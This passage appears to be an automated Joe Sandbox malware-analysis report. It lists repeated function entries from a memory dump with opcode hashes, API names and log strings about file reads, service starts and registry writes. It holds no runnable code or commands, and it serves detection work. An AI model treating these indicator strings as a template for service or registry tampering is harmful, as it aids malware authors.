                                    • Opcode Fuzzy Hash: 4870d544d535033029d480653b6722bb726d195aed30ebe31d3fc1a3d62f9b41
                                    • Instruction Fuzzy Hash: A9F0BEA3B0D28381F9139A24FC517B912512F92774F0905318D5C8A6E1EEFCAC829202
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: b31d3a5901d0513704d4fe754bffd3a407be5763b5c741f5472f0051b2e3fa67
                                    • Instruction ID: 58cad8d1a557d7e5dc081512fd3eb9598f11a9f35a92f38aa1bc2f51e7dc6af1
                                    • Opcode Fuzzy Hash: b31d3a5901d0513704d4fe754bffd3a407be5763b5c741f5472f0051b2e3fa67
                                    • Instruction Fuzzy Hash: 3BF0BEA3F0D28381F9139A24FC517B812512F92774F090531CD5C8A6E1EEFCAC829202
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: 79f5628ac98b178e595bceb9258ce74583370275243635646760adc4866a2855
                                    • Instruction ID: 490b8c260b48c51114f5de9cbe4706f100b6b1ed0c9f65154b68bdaa84ff0c8d
                                    • Opcode Fuzzy Hash: 79f5628ac98b178e595bceb9258ce74583370275243635646760adc4866a2855
                                    • Instruction Fuzzy Hash: D6F0BEA3B0D28381F9139A24FC517B852512F92774F0905328D5C8AAE1EEFCAC829202
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: CloseHandleService
                                    • String ID: [E] (%s) -> Service start failed(lpServiceName=%s,err=%08x)$scm_start
                                    • API String ID: 1725840886-2678404757
                                    • Opcode ID: fe283bf00ec4d4bd9c62e94c2f5eb6f31ec38c09f1da1a3e5da74ccad50825a1
                                    • Instruction ID: 9fe107dd57b77580c384eccf3755df90d74813af2aa52a4fd7974be76d850b2d
                                    • Opcode Fuzzy Hash: fe283bf00ec4d4bd9c62e94c2f5eb6f31ec38c09f1da1a3e5da74ccad50825a1
                                    • Instruction Fuzzy Hash: ACF01DA2F0C5A782FA675A34ED406B922506F03BA8F451135CD5EDB6B09DBCAD819382
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: CloseHandleService
                                    • String ID: [E] (%s) -> Service start failed(lpServiceName=%s,err=%08x)$scm_start
                                    • API String ID: 1725840886-2678404757
                                    • Opcode ID: bc8aeb85be358ea8940a261e10e09c849a5545bd73b064f9e67d93773e851f0f
                                    • Instruction ID: aee1b00c3338e171e1f1fbd3a9dbdba1bf0addeb74f8c489b2121fbc0db7acb6
                                    • Opcode Fuzzy Hash: bc8aeb85be358ea8940a261e10e09c849a5545bd73b064f9e67d93773e851f0f
                                    • Instruction Fuzzy Hash: 04F096B2F0C19781FA335630ED406F812106F03BA8F450134CC5ED76B09DBCAC819382
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: CloseHandleService
                                    • String ID: [E] (%s) -> Service start failed(lpServiceName=%s,err=%08x)$scm_start
                                    • API String ID: 1725840886-2678404757
                                    • Opcode ID: 526a7844ee824464c7f5dda1b3fa2dfc5604c44a0c8f11cd960e1c284dbd8f0d
                                    • Instruction ID: 51e1ae6bcd8675548031878a5aa8f86b66e03570ebfecef0ff924ef84672693f
                                    • Opcode Fuzzy Hash: 526a7844ee824464c7f5dda1b3fa2dfc5604c44a0c8f11cd960e1c284dbd8f0d
                                    • Instruction Fuzzy Hash: B5F090B2F0C1A782FA335A30ED406F822106F03BA8F450135CC5EDB6B09DBCAC819382
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: CloseHandleService
                                    • String ID: [E] (%s) -> Service start failed(lpServiceName=%s,err=%08x)$scm_start
                                    • API String ID: 1725840886-2678404757
                                    • Opcode ID: 052b3f7a116b45ceed3f32286ad25e0bde322c65dcf123356c38faf241316b1a
                                    • Instruction ID: 26ab2c6f80f977ea623589efed0b629f73c7f53cd6a8c358b6520fc164b39298
                                    • Opcode Fuzzy Hash: 052b3f7a116b45ceed3f32286ad25e0bde322c65dcf123356c38faf241316b1a
                                    • Instruction Fuzzy Hash: 03F012B2F0C59781FA775A34ED405B922506F03BA4F451134CD5ED76B09DBCAD419382
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
                                    • API String ID: 1001908780-3542721600
                                    • Opcode ID: a828de9d4de61884459108732baba28d0de56727cdcedf63e20db0dff29f6152
                                    • Instruction ID: 14df7d4ee957f54eb6bda2c0bd8b8bb1c7e8ec2d4c4208a5333584e1fb6b1f1d
                                    • Opcode Fuzzy Hash: a828de9d4de61884459108732baba28d0de56727cdcedf63e20db0dff29f6152
                                    • Instruction Fuzzy Hash: 38E012D2B1C6CA41F553AB20FC400B96350EB96B95F444135DD0E865B19EACEE89E305
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
                                    • API String ID: 1001908780-3542721600
                                    • Opcode ID: 481d060fc04bbc5fec821423f4238d49e749726e5889c284cfca1639315484e4
                                    • Instruction ID: beca215e79ee32387bfdb18264705f7944da947ef5c9f3e55823dc2527d6f0e5
                                    • Opcode Fuzzy Hash: 481d060fc04bbc5fec821423f4238d49e749726e5889c284cfca1639315484e4
                                    • Instruction Fuzzy Hash: 06E012D2B1C6C641F553AB20FC400B96354EB96B94F444135DD0E865B19EACEE89E306
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
                                    • API String ID: 1001908780-3542721600
                                    • Opcode ID: e47297a8893ea21cdecfa720eb9367ccb093d0abb19c17bccbc8174874117dba
                                    • Instruction ID: bb501e32a6a549c409a69a0d4f13fce539a83b8a81ae1017f5d25feef43d3d78
                                    • Opcode Fuzzy Hash: e47297a8893ea21cdecfa720eb9367ccb093d0abb19c17bccbc8174874117dba
                                    • Instruction Fuzzy Hash: D3E012D2B1C6C641F553AB60FC401B96350EB96B94F444135DD0EC65B19EACEE89E305
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
                                    • API String ID: 1001908780-3542721600
                                    • Opcode ID: c946c756a35d6430061bae648868228424b266cc6f3915f4760e4eac1fe5a461
                                    • Instruction ID: 58095023282220990cdb01672f4276a47aab9a5c4ae5ae3b22063d70da06f8eb
                                    • Opcode Fuzzy Hash: c946c756a35d6430061bae648868228424b266cc6f3915f4760e4eac1fe5a461
                                    • Instruction Fuzzy Hash: DFE012D2B1C6C641F553AB20FC400B96350EB86B94F444135DD4E865B19EACEEC9E305
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
                                    • API String ID: 1001908780-3542721600
                                    • Opcode ID: a71f44405f3611459bc841544f7a580ad69077bf9f475503d8ffd6c45d9d9d01
                                    • Instruction ID: b7a0005ef753795748e3f5c311cdf5668547b22ffa820d91f32f00b6808f7869
                                    • Opcode Fuzzy Hash: a71f44405f3611459bc841544f7a580ad69077bf9f475503d8ffd6c45d9d9d01
                                    • Instruction Fuzzy Hash: 72E012D2B1C6C641F5536B20FC401B96350EB96B94F444135DD0D865B19EACEE89E305
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
                                    • API String ID: 1001908780-1337547089
                                    • Opcode ID: aa78d82be79eb22537591a4ef03cf34fbd51db42a935cfbbda7e58d2f13827a2
                                    • Instruction ID: 6f73c72b509c7053fe34a4e58da52ba0067f7486a2224aefa12ca1f7a4cdca9a
                                    • Opcode Fuzzy Hash: aa78d82be79eb22537591a4ef03cf34fbd51db42a935cfbbda7e58d2f13827a2
                                    • Instruction Fuzzy Hash: E0E012E1B0C68A81F5136B20FC000B57214FB45784F44013ADD4E866719EACEE85D241